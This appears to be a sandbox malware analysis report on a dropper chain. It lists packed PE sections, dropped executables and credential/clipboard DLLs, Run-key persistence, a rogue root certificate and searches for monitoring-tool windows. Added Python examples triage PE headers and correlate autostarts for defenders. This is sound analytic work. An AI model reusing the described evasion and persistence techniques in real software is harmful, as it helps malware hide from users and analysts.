Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Unpacked PE file: 37.2.chrosha.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Unpacked PE file: 42.2.2531414c80.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | Unpacked PE file: 43.2.RageMP131.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW; vs :ER;.rsrc:W;.idata :W; :EW;unpqzwpm:EW;glmqmaxs:EW;
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Unpacked PE file: 44.2.chrosha.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxbjlfg:EW;kzjaljwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Unpacked PE file: 45.2.explorta.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wqkjverv:EW;wmthiooa:EW;.taggant:EW;
Source: BIT1659.tmp.6.dr | Static PE information: 0xEC3B20ED [Thu Aug 4 12:07:09 2095 UTC]
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_000D42DE
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: clip64.dll.44.dr | Static PE information: real checksum: 0x0 should be: 0x2272f
Source: amert[1].exe.2.dr | Static PE information: real checksum: 0x1ebfee should be: 0x1e8c52
Source: cred64[1].dll.44.dr | Static PE information: real checksum: 0x0 should be: 0x14356f
Source: alexxxxxxxx[1].exe.44.dr | Static PE information: real checksum: 0x0 should be: 0x1c49ab
Source: explorta.exe.0.dr | Static PE information: real checksum: 0x1debc8 should be: 0x1de8d3
Source: cred64.dll.44.dr | Static PE information: real checksum: 0x0 should be: 0x14356f
Source: swiiiii[1].exe.44.dr | Static PE information: real checksum: 0x562fb should be: 0x5eece
Source: clip64[1].dll.44.dr | Static PE information: real checksum: 0x0 should be: 0x2272f
Source: swiiiii.exe.44.dr | Static PE information: real checksum: 0x562fb should be: 0x5eece
Source: amert.exe.2.dr | Static PE information: real checksum: 0x1ebfee should be: 0x1e8c52
Source: chrosha.exe.26.dr | Static PE information: real checksum: 0x1ebfee should be: 0x1e8c52
Source: file.exe | Static PE information: real checksum: 0x1debc8 should be: 0x1de8d3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: wqkjverv
Source: file.exe | Static PE information: section name: wmthiooa
Source: file.exe | Static PE information: section name: .taggant
Source: explorta.exe.0.dr | Static PE information: section name:
Source: explorta.exe.0.dr | Static PE information: section name: .idata
Source: explorta.exe.0.dr | Static PE information: section name:
Source: explorta.exe.0.dr | Static PE information: section name: wqkjverv
Source: explorta.exe.0.dr | Static PE information: section name: wmthiooa
Source: explorta.exe.0.dr | Static PE information: section name: .taggant
Source: amert[1].exe.2.dr | Static PE information: section name:
Source: amert[1].exe.2.dr | Static PE information: section name: .idata
Source: amert[1].exe.2.dr | Static PE information: section name:
Source: amert[1].exe.2.dr | Static PE information: section name: nkxbjlfg
Source: amert[1].exe.2.dr | Static PE information: section name: kzjaljwy
Source: amert[1].exe.2.dr | Static PE information: section name: .taggant
Source: amert.exe.2.dr | Static PE information: section name:
Source: amert.exe.2.dr | Static PE information: section name: .idata
Source: amert.exe.2.dr | Static PE information: section name:
Source: amert.exe.2.dr | Static PE information: section name: nkxbjlfg
Source: amert.exe.2.dr | Static PE information: section name: kzjaljwy
Source: amert.exe.2.dr | Static PE information: section name: .taggant
Source: random[1].exe0.2.dr | Static PE information: section name:
Source: random[1].exe0.2.dr | Static PE information: section name: .idata
Source: random[1].exe0.2.dr | Static PE information: section name:
Source: random[1].exe0.2.dr | Static PE information: section name: unpqzwpm
Source: random[1].exe0.2.dr | Static PE information: section name: glmqmaxs
Source: 2531414c80.exe.2.dr | Static PE information: section name:
Source: 2531414c80.exe.2.dr | Static PE information: section name: .idata
Source: 2531414c80.exe.2.dr | Static PE information: section name:
Source: 2531414c80.exe.2.dr | Static PE information: section name: unpqzwpm
Source: 2531414c80.exe.2.dr | Static PE information: section name: glmqmaxs
Source: sarra[1].exe.2.dr | Static PE information: section name:
Source: sarra[1].exe.2.dr | Static PE information: section name: .idata
Source: sarra[1].exe.2.dr | Static PE information: section name:
Source: sarra[1].exe.2.dr | Static PE information: section name: xoahvbru
Source: sarra[1].exe.2.dr | Static PE information: section name: vfiegpwq
Source: RageMP131.exe.8.dr | Static PE information: section name:
Source: RageMP131.exe.8.dr | Static PE information: section name: .idata
Source: RageMP131.exe.8.dr | Static PE information: section name:
Source: RageMP131.exe.8.dr | Static PE information: section name: unpqzwpm
Source: RageMP131.exe.8.dr | Static PE information: section name: glmqmaxs
Source: MPGPH131.exe.8.dr | Static PE information: section name:
Source: MPGPH131.exe.8.dr | Static PE information: section name: .idata
Source: MPGPH131.exe.8.dr | Static PE information: section name:
Source: MPGPH131.exe.8.dr | Static PE information: section name: unpqzwpm
Source: MPGPH131.exe.8.dr | Static PE information: section name: glmqmaxs
Source: chrosha.exe.26.dr | Static PE information: section name:
Source: chrosha.exe.26.dr | Static PE information: section name: .idata
Source: chrosha.exe.26.dr | Static PE information: section name:
Source: chrosha.exe.26.dr | Static PE information: section name: nkxbjlfg
Source: chrosha.exe.26.dr | Static PE information: section name: kzjaljwy
Source: chrosha.exe.26.dr | Static PE information: section name: .taggant
Source: cred64[1].dll.44.dr | Static PE information: section name: _RDATA
Source: cred64.dll.44.dr | Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_005AD10C push ecx; ret 2_2_005AD11F
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000F0A76 push ecx; ret 4_2_000F0A89
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007A3F49 push ecx; ret 8_2_007A3F5C
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_050D030B push ebx; retf 8_2_050D03FB
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_050D0313 push ebx; retf 8_2_050D03FB
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_050D0346 push ebx; retf 8_2_050D03FB
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_050D035D push ebx; retf 8_2_050D03FB
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_050D038A push ebx; retf 8_2_050D03FB
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_050D03B4 push ebx; retf 8_2_050D03FB
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_050D03E2 push ebx; retf 8_2_050D03FB
Source: file.exe | Static PE information: section name: entropy: 7.923021973448171
Source: file.exe | Static PE information: section name: wqkjverv entropy: 7.95472970828884
Source: explorta.exe.0.dr | Static PE information: section name: entropy: 7.923021973448171
Source: explorta.exe.0.dr | Static PE information: section name: wqkjverv entropy: 7.95472970828884
Source: amert[1].exe.2.dr | Static PE information: section name: entropy: 7.978115259211233
Source: amert[1].exe.2.dr | Static PE information: section name: nkxbjlfg entropy: 7.954199818301463
Source: amert.exe.2.dr | Static PE information: section name: entropy: 7.978115259211233
Source: amert.exe.2.dr | Static PE information: section name: nkxbjlfg entropy: 7.954199818301463
Source: random[1].exe0.2.dr | Static PE information: section name: entropy: 7.926018742616288
Source: random[1].exe0.2.dr | Static PE information: section name: unpqzwpm entropy: 7.913649772578251
Source: 2531414c80.exe.2.dr | Static PE information: section name: entropy: 7.926018742616288
Source: 2531414c80.exe.2.dr | Static PE information: section name: unpqzwpm entropy: 7.913649772578251
Source: sarra[1].exe.2.dr | Static PE information: section name: entropy: 7.926032184293041
Source: sarra[1].exe.2.dr | Static PE information: section name: xoahvbru entropy: 7.912609290174337
Source: RageMP131.exe.8.dr | Static PE information: section name: entropy: 7.926018742616288
Source: RageMP131.exe.8.dr | Static PE information: section name: unpqzwpm entropy: 7.913649772578251
Source: MPGPH131.exe.8.dr | Static PE information: section name: entropy: 7.926018742616288
Source: MPGPH131.exe.8.dr | Static PE information: section name: unpqzwpm entropy: 7.913649772578251
Source: chrosha.exe.26.dr | Static PE information: section name: entropy: 7.978115259211233
Source: chrosha.exe.26.dr | Static PE information: section name: nkxbjlfg entropy: 7.954199818301463
Source: swiiiii[1].exe.44.dr | Static PE information: section name: .text entropy: 7.992152217310619
Source: swiiiii.exe.44.dr | Static PE information: section name: .text entropy: 7.992152217310619
Source: alexxxxxxxx[1].exe.44.dr | Static PE information: section name: .text entropy: 7.940192854489615
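The static observations above (a stored CheckSum of 0x0 or a value that does not match the recomputed one, section entropy around 7.9 bits per byte, unnamed or randomly named sections that are writable on disk and executable once unpacked, an entry point inside a non-standard section, and a TimeDateStamp in 2095) can all be reproduced from the file headers alone. The following is an added example written for this page, not Joe Sandbox code. It uses only the Python standard library; the CheckSum routine follows the imagehlp algorithm as reimplemented in pefile, and `build_sample_pe()` constructs a tiny PE32 image in memory (its section names, zero CheckSum and 0xEC3B20ED timestamp imitate the report) so the code runs offline without the malware sample.

```python
"""Static PE triage: CheckSum, section entropy, section rights, TimeDateStamp.

Added example, not Joe Sandbox code. Standard library only; the PE image that
build_sample_pe() returns is constructed here and is not the analysed sample.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0..8; a whole section near 7.9+ is packed or encrypted."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """IMAGE_OPTIONAL_HEADER.CheckSum as imagehlp computes it: little-endian dword
    sum with 32-bit carry folding, skipping the CheckSum field itself, folded to
    16 bits, plus the file length. A mismatch means the image was modified."""
    padded = data + b"\0" * (-len(data) % 4)
    checksum = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        checksum += struct.unpack_from("<I", padded, off)[0]
        if checksum >= 1 << 32:
            checksum = (checksum & 0xFFFFFFFF) + (checksum >> 32)
    checksum = (checksum & 0xFFFF) + (checksum >> 16)
    checksum += checksum >> 16
    return (checksum & 0xFFFF) + len(data)


def pe_timestamp(ts: int) -> datetime:
    """Decode TimeDateStamp; timedelta avoids platform limits on far-future values."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def rights(characteristics: int) -> str:
    """Section Characteristics rendered as R/W/X, e.g. 'RWX' for a packer section."""
    bits = (("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE), ("X", IMAGE_SCN_MEM_EXECUTE))
    return "".join(flag if characteristics & bit else "-" for flag, bit in bits)


def triage_pe(data: bytes) -> dict:
    """Parse just enough of the PE headers to reproduce the report's static checks."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]
    ts = struct.unpack_from("<I", data, pe + 8)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                          # optional header
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 64)[0]   # CheckSum field
    sections, entry_section = [], None
    for i in range(nsect):
        hdr = opt + opt_size + 40 * i                      # IMAGE_SECTION_HEADER
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, hdr + 8)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        body = data[rawptr:rawptr + rawsize]
        sections.append({"name": name, "rights": rights(chars),
                         "entropy": round(shannon_entropy(body), 3)})
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name                           # cf. ".taggant" above
    return {"timestamp": pe_timestamp(ts), "checksum_stored": stored,
            "checksum_computed": pe_checksum(data, opt + 64),
            "entry_section": entry_section, "sections": sections}


def with_checksum(data: bytes) -> bytes:
    """Copy of the image with a correct CheckSum, to show the field is verifiable."""
    off = struct.unpack_from("<I", data, 0x3C)[0] + 24 + 64
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, off, pe_checksum(data, off))
    return bytes(fixed)


def build_sample_pe() -> bytes:
    """Constructed PE32: a low-entropy .text plus a packer-style RWX section
    (named after the report's 'wqkjverv') that holds the entry point."""
    pe_off, opt_size = 64, 224
    data_off = pe_off + 24 + opt_size + 40 * 2            # first section body
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", pe_off)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0xEC3B20ED, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000)                # entry point in packed section
    # opt[64:68] (CheckSum) stays 0, as for the dropped DLLs in the report

    def shdr(name, vsize, va, rawsize, rawptr, chars):
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)

    text, packed = b"\x90" * 64, bytes(range(256))         # entropy 0 and 8
    secs = (shdr(b".text", 64, 0x1000, 64, data_off, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE)
            + shdr(b"wqkjverv", 256, 0x2000, 256, data_off + 64,
                   IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE))
    return dos + coff + bytes(opt) + secs + text + packed
```

To run it against a real dropped file, pass `open(path, "rb").read()` to `triage_pe()`. Two caveats when reading the results: a zero CheckSum is common in unsigned, non-driver binaries and is only a weak signal on its own (the loader ignores it outside kernel images), whereas a non-zero value that does not match, like 0x1ebfee against 0x1e8c52 above, means the bytes were changed after the header was written; and `entropy` is computed over the raw section, so a large section that mixes code with an encrypted blob can score lower than the blob itself.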

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\amert[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000149001\gold.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000208001\install.exe
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File created: C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\swiiiii[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File created: C:\ProgramData\MPGPH131\MPGPH131.exe
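The value of this section for triage comes from joining its lines: the three HKCU Run values that the Boot Survival section below lists (RageMP131, b3168c3d9b.exe, 2531414c80.exe) are each named after a file dropped above into AppData or Temp, and the ROOT store write comes from RegAsm.exe, a .NET framework tool with no reason to install certificates. The following added example (written for this page, not Joe Sandbox code) does that correlation over behaviour lines in the "Source: <process> | <observation>" form used on this page. The sample lines are copied from this report; the list of user-writable roots, the name-based matching of Run values to dropped files, and the finding types are this example's own assumptions, and the logic mirrors, but is not, the Sigma rule the overview mentions.

```python
"""Correlate Run-key autostarts and ROOT-store writes with dropped files.

Added example, not Joe Sandbox code. SAMPLE_LINES are observation lines from
this report; the roots, regexes and finding types are assumptions of this example.
"""
import re
from pathlib import PureWindowsPath

# Roots where a legitimately installed autostart target is rarely found (assumption).
USER_WRITABLE_ROOTS = (
    r"c:\users\user\appdata\local",
    r"c:\users\user\appdata\roaming",
    r"c:\programdata",
)
SOURCE_RE = re.compile(r"^Source: (?P<src>.+?) \| (?P<detail>.+)$")
FILE_RE = re.compile(r"File created: (?P<path>[A-Za-z]:\\\S+\.(?:exe|dll))\b", re.I)
RUN_KEY_RE = re.compile(r"Registry value created or modified: (?P<key>HKEY_[A-Z_]+\\\S*\\Run) (?P<value>\S+)")
ROOT_CERT_RE = re.compile(r"SystemCertificates\\ROOT\\Certificates\\(?P<thumb>[0-9A-F]{40})")

SAMPLE_LINES = [  # copied from this report's Persistence and Boot Survival sections
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob",
    r"Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File created: C:\ProgramData\MPGPH131\MPGPH131.exe",
    r"Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll",
    r"Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131",
    r"Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2531414c80.exe",
]


def under_user_writable(path: str) -> bool:
    low = path.lower()
    return any(low.startswith(root + "\\") for root in USER_WRITABLE_ROOTS)


def correlate(lines):
    """Return de-duplicated findings: Run values resolving to dropped executables
    in user-writable locations, unresolved Run values, and ROOT-store installs."""
    parsed = [m.groupdict() for m in map(SOURCE_RE.match, (l.strip() for l in lines)) if m]
    dropped = {}                                   # basename stem -> dropped paths
    for rec in parsed:                             # first pass: every dropped PE
        if m := FILE_RE.search(rec["detail"]):
            p = PureWindowsPath(m["path"])
            dropped.setdefault(p.stem.lower(), []).append(str(p))
    findings = []
    for rec in parsed:                             # second pass: persistence events
        detail = rec["detail"]
        if m := RUN_KEY_RE.search(detail):
            stem = PureWindowsPath(m["value"]).stem.lower()
            targets = [t for t in dropped.get(stem, []) if under_user_writable(t)]
            for t in targets:
                findings.append({"type": "autostart_user_dir", "process": rec["src"],
                                 "key": m["key"], "value": m["value"], "target": t})
            if not targets:
                findings.append({"type": "autostart_unresolved", "process": rec["src"],
                                 "key": m["key"], "value": m["value"]})
        elif m := ROOT_CERT_RE.search(detail):
            findings.append({"type": "root_cert_install", "process": rec["src"],
                             "thumbprint": m["thumb"]})
    unique, seen = [], set()                       # reports repeat identical events
    for f in findings:
        key = tuple(sorted(f.items()))
        if key not in seen:
            seen.add(key)
            unique.append(f)
    return unique
```

The report shows only the Run value names, not their data, so the match is by name against the dropped-file list; on a live host read the value data (the actual command line) from the Run key and compare it with the file paths instead. For the ROOT-store finding, export the Blob under the listed thumbprint and inspect the certificate before removing it, since a trusted root added this way lets the operator intercept TLS to any site the victim visits.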

Boot Survival

                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2531414c80.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: Filemonclass
